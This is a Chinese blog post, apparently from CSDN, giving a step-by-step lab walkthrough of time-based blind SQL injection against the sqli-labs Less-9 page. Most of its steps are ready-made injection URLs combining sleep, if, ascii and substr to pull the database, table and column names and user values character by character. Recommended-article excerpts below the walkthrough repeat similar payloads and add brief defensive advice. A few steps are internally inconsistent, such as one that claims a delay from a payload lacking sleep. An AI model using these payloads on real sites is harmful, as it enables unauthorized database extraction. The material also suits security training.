SQL注入sleep注入

最新推荐文章于 2024-04-15 20:23:57 发布
原创 最新推荐文章于 2024-04-15 20:23:57 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #web漏洞 #SQL注入

一、预备知识

熟悉基本SQL语句

二、实验目的

掌握SQL注入之sleep注入

三、实验工具

火狐浏览器(hackbar插件)

四、实验环境

1. Web服务器Windows Server 2003
2. 客户机一台

五、实验步骤

第一步:访问

http://www.any.com/sqli/Less-9/?id=1

页面正常返回:

在这里插入图片描述

第二步:加入单引号,访问

http://www.any.com/sqli/Less-9/?id=1'

不会报错,页面正常返回,可以判断可能是 bool 型注入:

在这里插入图片描述

第三步:查看数据库名称

1)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substr(database(),1,1))<116,0,5)) %23

页面正常返回,说明 database 的第一个字符的 ascii 小于 116:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substr(database(),1,1))<115,0,5)) %23

页面大约等待 5s 返回,说明 database 的第一个字符的 ascii 不小于 115,综上所述,第一个字符的 ascii 是 115,即 s:

在这里插入图片描述

依次类推,得到 database 为 :security。

第四步:查看 security 中所有表

1)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substr((select table_name from information_schema.tables where table_schema=' security' limit 0,1),1,1))<102,0,5)) %23

页面正常返回,说明表的第一个字符的 、ascii 小于 102:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-9/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=' security' limit 0,1),1,1))<101%23

页面返回大于等待 5s,说明表的第二个字符的 ascii 不小于 101,综上所述,第二个字符的 ascii 是 101,即e:

在这里插入图片描述

依次类推,得到所有的表为:emailsreferersuagentsusers

第五步:查看 users 表的所有的列

1)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substr((select column_name from information_schema.columns where table_name=' users' and table_schema=' security' limit 0,1),1,1))<106,0,5)) %23

页面正常返回,说明表的第一个字符的 ascii 小于 106:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substr((select column_name from information_schema.columns where table_name=' users' and table_schema=' security' limit 0,1),1,1))<105,0,5)) %23

页面返回大约等待 5s,说明表的第二个字符的 ascii 不小于 105,综上所述,第一个字符的 ascii 是 105,即i:

在这里插入图片描述

依次类推,得到表的所有列为:idusernamepassword

第六步:查看 username 的列的值

1)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substring((select username from security.users limit 0,1),1,1))<69,0,5)) %23

页面正常返回,说明表的第一个字符的 ascii 小于 69:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-9/?id=1' and sleep( if(ascii(substring((select username from security.users limit 0,1),1,1))<68,0,5)) %23

页面返回大约等待 5s,说明表的第一个字符的 ascii 不小于 68,综上所述,第一个字符的 ascii 是 68,即 D:

在这里插入图片描述

依次类推,得到 users 表 username 的值为:Dump

SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
网络安全SQL注入漏洞复现(中篇)(技术进阶)
weixin_70911257的博客
04-21 1813
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
网络安全--SQL注入sleep注入
weixin_43774199的博客
09-24 4432
课程目标:说明MySQLsleep()、substr()、count()、length()等函数的用法,讲解盲注和ASCII码,组织实验使学生掌握sleep注入方式。 任务目标:学会MySQLsleep()、substr()、count()、length()等函数的用法,了解盲注和ASCII码,掌握sleep注入方式。 A.MySQL中的sleep函数 MySQL中的sleep函数 在MySQL中执行select sleep(N)可以让此语句运行N秒钟,例如下图所示: Sleep函数.
sql注入-延时注入sleep()、benchmark()函数 延时注入
热门推荐
07-10 1万+
【延时注入】结合if、case when 延时注入
SQL注入漏洞 | sleep
weixin_52116519的博客
12-09 2005
SQL注入漏洞 | bool型if(SQL语句,sleep(),null)if()、sleep()的使用select * from table where id = 1 and sleep(2) //执行查询id=1,同时sleep(2)。
iwebsec靶场SQL注入-sleep注入
qq_56041380的博客
03-26 475
sleep注入是另一种盲注方式,与bool注入不同,sleep注入没有任何报错信息输出,页面返回不管对错都只是一种状态,攻击者无法通过页面返回状态来判断输入的SQL注入测试语句是否正确,只能通过构造sleep注入SQL测试语句,根据页面返回的返回时间判断数据库中存储了哪些信息
sql注入字典fuzz
01-11
1. **SQL关键字与函数**:SQL注入字典中包含了大量SQL关键字与函数,如`select`、`database`、`sleep`等。这些关键字与函数在实际的SQL注入攻击中非常常见。 2. **大小写变化**:许多SQL关键字支持大小写不敏感特性...
sql注入-延时注入
课嗨教育的专栏
04-28 1705
渗透测试基础课-课程进度_不死的小鱼的博客-优快云博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返回信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返回14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
sleep()注入
qq_43616736的博客
07-27 1193
sleep() :原理 利用sleep() 语句的延时性,一时间线作为判断条件 利用if()函数 if(xxx,ture,false)/当xxx为真时返回ture 假返回...
SQL注入sleep()函数相关解决方案
一杯咖啡的渗透记忆
08-14 7039
最近做安全扫描的时候,经常遇到sleep()型的SQL注入,这个是request发送后会产生一个timeout的delay,没有respond。 跟我之前遇到的一般意思SQL注入不一样,之前的是SQL语句拼接产生的注入,会通过注入点抓到数据库。 这个相当于一种DDOS攻击,向数据库不停的发送request,不会很快释放连接,连接池会慢,导致数据库不响应。   解决方案:    在MY...
sleep 延迟注入
weixin_34208185的博客
11-09 974
A: 时间差注入也叫延迟注入,是一种盲注的手法 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注。 利用BENCHMARK sleep 函数来注入 利用sleep也可以引起拒绝服务B:有时候当我们注入某站时,某站突然就打不开了,被防火墙暂时隔离,...
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
mooyuan的网络安全博客
11-26 2206
iwebsec靶场的SQL注入漏洞的第04关sleep注入漏洞渗透,iwebsec靶场的时间型盲注由于没有任何过滤信息,与bool型盲注一样为数字型布尔盲注,故而使用sqlmap渗透十分方便高效。时间型盲注相对而言十分耗时,手注或者半自动化注入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化注入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度。
关于SQL时间盲注(基于sleep函数)的手动测试、burpsuite爆破、sqlmap全自动化注入
Welcome To Myon'Blog !
12-27 4795
这么说吧:一般sqlmap能跑出来的基本上都没啥问题,这种是不存在什么绕过和过滤的,一般存在过和过滤的,sqlmap基本上都跑不出来,需要手工注入SQL时间注入是一种常见的SQL注入攻击方式,攻击者通过在SQL语句中注入时间相关的代码,来获取敏感信息或者执行非法操作。攻击者可以根据SQL语句的执行时间,来推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。6.09s,和我们设置的sleep 5s 差不多,说明sleep语句被执行了,存在时间盲注。
HTTP头sleep延迟注入
aitangdao4981的博客
05-30 401
http://123.206.87.240:8002/web15 无回显,通过http header里的X-Forwarded-For字段进行sleep注入。 源码过滤了 ',' 那么相应的if语句可以替换为select case when xxx then xxx else 0 end substr和substring里使用from 1 for 1代替',' 1 # -*...
mysql时间 注入 sleep_SQL注入进阶
weixin_29442195的博客
01-28 1244
原标题:SQL注入进阶 1、时间注入攻击时间注入攻击的测试地址:http://ccctf.cn/sql/time/time.php?id=1。访问该网址时,页面返回yes,在网址的后面加上一个单引号,再次访问,页面返回no。这个结果与Boolean注入非常相似,下面介绍遇到这种情况时的另外一种注入方法——时间盲注。它与Boolean注入的不同之处在于,时间注入是利用sleep或benchmark等...
sql注入之时间注入
m0_63436163的博客
04-15 1201
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法为时间注入。-u 表示检测的 url。-p 指定的检测参数。
sql漏洞注入——时间注入
m0_73756016的博客
11-01 2338
id=1' and if(length(database())>8,sleep(5),0)--+1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。1" and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
php 延时注入测试,墨者 - SQL注入漏洞测试(时间盲注)
weixin_34553861的博客
03-23 302
按照题意,正规思路flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+通告sleep()函数判断数据长度 然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+用bp字典结合substr函数爆库==>爆表==>爆字...
sql注入sleep语句
最新发布
03-17
### SQL注入SLEEP函数的使用 在SQL注入场景下,`SLEEP()` 函数常被用于时间盲注攻击。通过向数据库发送一条指令并让其延迟响应一段时间,攻击者可以判断查询是否成功执行以及是否存在漏洞[^4]。 以下是 `SLEEP()` 的基本语法及其工作原理: #### 基本语法 ```sql SELECT SLEEP(seconds); ``` 其中 `seconds` 是一个整数参数,表示服务器应暂停的时间长度(单位为秒)。如果该值小于等于零,则不会发生任何延迟。 当利用此功能实施渗透测试时,可以通过条件表达式结合 `IF()` 和 `SLEEP()` 来实现逻辑控制。例如,在 MySQL 中有如下形式: ```sql IF(condition, true_result, false_result) ``` 这里我们关注的是如何使程序等待特定时间段作为反馈机制的一部分。 #### 实际应用案例分析 假设存在这样一个易受攻击的 URL 参数结构: ``` http://example.com/page?id=1 ``` 后台可能运行着这样的查询代码片段: ```php $query = "SELECT * FROM articles WHERE id=".$_GET['id']; ``` 此时就可以尝试构造恶意请求以验证是否存在可利用之处。下面给出几个具体例子说明不同情况下的操作手法。 ##### 方法一:基础版延时探测 最简单的做法就是直接附加带有固定数值的睡眠命令到原有数据后面去观察前后耗时差异。 ``` http://example.com/page?id=1 AND SLEEP(5)--+ ``` 上述链接会令目标主机上的处理过程停滞五秒钟再继续完成其余部分的工作流程;假如页面加载速度显著变慢则表明可能存在隐患。 ##### 方法二:动态调整依据实际返回结果定制化策略 为了更精确地定位问题所在位置或者进一步收集更多信息,还可以引入额外变量参与运算从而形成更加灵活多样的组合拳套路。比如先确定当前记录总数然后再逐一排查各个字段内容等等... ``` http://example.com/page?id=-1 UNION ALL SELECT IF(SUBSTRING(database(),1,1)='m',SLEEP(5),NULL) --+ ``` 这段脚本的作用在于逐位猜测数据库名的第一个字母是不是 'm' 。如果是的话就触发相应的休眠动作以便后续统计分析之需。 需要注意的是以上所有的演示均仅限于合法授权范围内的安全性评估活动当中严禁非法滥用! #### 防御措施建议 针对此类威胁应当采取综合性的防护手段包括但不限于以下几个方面: - **输入校验**:严格限定外部提交过来的数据格式不允许出现特殊字符未经许可擅自修改原始意图的行为一律拒绝受理; - **预编译语句**:采用占位符代替手动拼接字符串的方式构建最终要被执行的实际SQL文本减少人为失误带来的风险因素影响程度降到最低限度之内 - **最小权限原则**:合理分配账户角色职能划分清楚各自的职责边界避免因过度开放而导致不必要的麻烦困扰等问题的发生几率大大降低下来 ```python import time def simulate_sleep_attack(): start_time = time.time() # Simulate a vulnerable query with injected sleep command. result = execute_query("SELECT * FROM users WHERE id = 1 AND SLEEP(5)") elapsed_time = time.time() - start_time if elapsed_time >= 5: print("Potential vulnerability detected!") else: print("No vulnerability found.") simulate_sleep_attack() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值